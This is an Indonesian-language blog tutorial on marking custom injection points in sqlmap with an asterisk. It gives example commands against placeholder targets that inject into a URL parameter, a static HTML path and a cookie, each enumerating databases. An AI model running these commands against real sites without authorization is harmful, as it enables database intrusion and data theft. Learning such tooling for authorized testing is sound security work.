» » » » » Menentukan Inject Point pada SQLmap
, , ,

Menentukan Inject Point pada SQLmap

Menentukan Inject Point pada SQLmap. Kita sering melihat tutorial bagaimana menginjeksi url yang vuln. Namun rata-rata tutorial yang diberikan adalah basic sqlmap dimana inject pointnya selalu sama yakni target.com/a.php?b=1. Nah, bagaimana jika inject pointnya berbeda? Di Sqlmap kita bisa menentukan inject pointnya.
Misalnya begini:
https://target.com/article.php?page=2&id=5
Dan inject pointnya ada di parameter id.  Maka perintahnya
sqlmap -u "https://target.com/article.php?page=2&id=5*" --dbs
Ya, hanya dengan menambahkan karakter * di inject point. Hal ini juga berlaku jika yang diinject adalah halaman statis html. Misalnya vuln di
https://target.com/article-315'-abcde.html
Maka di sqlmap perintahnya
sqlmap -u "https://target.com/article-315*-abcde.html" --dbs
Begitu juga dengan sqlmap post data, inject pointnya bisa ditentukan, misalnya
sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"
  • referensi : https://miloserdov.org/?p=879
Share on Facebook
Share on Twitter
Share on Google+
Share on LinkedIn

Subscribe to receive free email updates:

0 Response to "Menentukan Inject Point pada SQLmap"

Post a Comment

Subscribe to: Post Comments (Atom)